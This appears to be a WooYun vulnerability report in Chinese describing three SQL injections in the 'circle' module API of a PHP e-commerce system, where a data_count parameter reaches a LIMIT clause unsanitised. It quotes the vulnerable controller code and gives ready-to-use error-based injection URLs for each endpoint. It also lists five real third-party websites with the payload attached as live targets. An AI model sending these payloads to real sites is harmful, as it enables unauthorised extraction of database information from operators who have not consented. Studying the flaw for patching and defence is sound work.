2015-07-09: 细节已通知厂商并且等待厂商处理中 2015-07-14: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2015-09-07: 细节向核心白帽子及相关领域专家公开 2015-09-17: 细节向普通白帽子公开 2015-09-27: 细节向实习白帽子公开 2015-10-12: 细节向公众公开
直接出数据
先来五个互联网实例
http://www.0795hui.com/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1)
http://www.hfmy.cc/modules/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1)
http://sn.atmbux.com/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1)
http://www.wbshyw.com/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1)
http://o.yugongw.com/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1)
注入#1看到circle\control\api.php
public function get_theme_listOp() { $result = ''; $data_count = 2; if(!empty($_GET['data_count']) && intval($_GET['data_count']) > 0) { $data_count = $_GET['data_count']; } $model = Model(); $theme_list = $model->table('circle_theme')->field('*, is_recommend*rand()*10000 + has_affix*rand() as rand')->where(array('circle_status'=>1, 'is_closed'=>0))->where(array('has_affix'=>1))->order('rand desc')->limit($data_count)->select(); if(!empty($theme_list)){ $theme_list = array_under_reset($theme_list, 'theme_id'); $themeid_array = array_keys($theme_list); // 附件 $affix_list = $model->table('circle_affix')->where(array('theme_id'=>array('in', $themeid_array), 'affix_type'=>1))->group('theme_id')->select(); if(!empty($affix_list)) $affix_list = array_under_reset($affix_list, 'theme_id'); foreach ($theme_list as $key=>$val){ if(isset($affix_list[$val['theme_id']])) $theme_list[$key]['affix'] = themeImageUrl($affix_list[$val['theme_id']]['affix_filethumb']); } } if($this->data_type === 'json') { $result = json_encode($theme_list); } else { Tpl::output('theme_list', $theme_list); ob_start(); Tpl::showpage('api_theme_list', 'null_layout'); $result = ob_get_clean(); } $this->return_result($result); }
if(!empty($_GET['data_count']) && intval($_GET['data_count']) > 0) { $data_count = $_GET['data_count'];}这里存在很明显的逻辑错误,因为intval(1xxxx)=1,然后直接进入了limit没有单引号包裹。造成注入。exp为
index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1)
注入#2
public function get_reply_themelistOp() { $result = ''; $data_count = 3; if(!empty($_GET['data_count']) && intval($_GET['data_count']) > 0) { $data_count = $_GET['data_count']; //注入2 } $model = Model(); $reply_themelist = $model->table('circle_theme')->where(array('is_closed'=>0))->order('theme_commentcount desc')->limit($data_count)->select(); if($this->data_type === 'json') { $result = json_encode($reply_themelist); } else { Tpl::output('reply_themelist', $reply_themelist); ob_start(); Tpl::showpage('api_reply_themelist', 'null_layout'); $result = ob_get_clean(); } $this->return_result($result); }
exp为
<code>index.php?act=api&op=get_reply_themelist&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1)
注入#3
public function get_more_memberthemeOp(){ $result = ''; $data_count = 4; if(!empty($_GET['data_count']) && intval($_GET['data_count']) > 0) { $data_count = $_GET['data_count']; //注入3 } $model = Model(); $more_membertheme = $model->table('circle_member,circle_theme')->field('circle_member.*,circle_theme.*, circle_member.is_recommend*10000*rand()+(circle_member.cm_thcount)/10000 as rand') ->order('rand desc') ->join('inner')->on('circle_member.member_id = circle_theme.member_id and circle_member.circle_id = circle_theme.circle_id') ->group('circle_member.member_id,circle_member.circle_id')->limit($data_count)->select(); if($this->data_type === 'json') { $result = json_encode($more_membertheme); } else { Tpl::output("more_membertheme", $more_membertheme); ob_start(); Tpl::showpage('api_more_membertheme', 'null_layout'); $result = ob_get_clean(); $this->return_result($result); } }
index.php?act=api&op=get_more_membertheme&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1)
过滤
危害等级:无影响厂商忽略
忽略时间:2015-10-12 12:39
漏洞Rank:4 (WooYun评价)
暂无
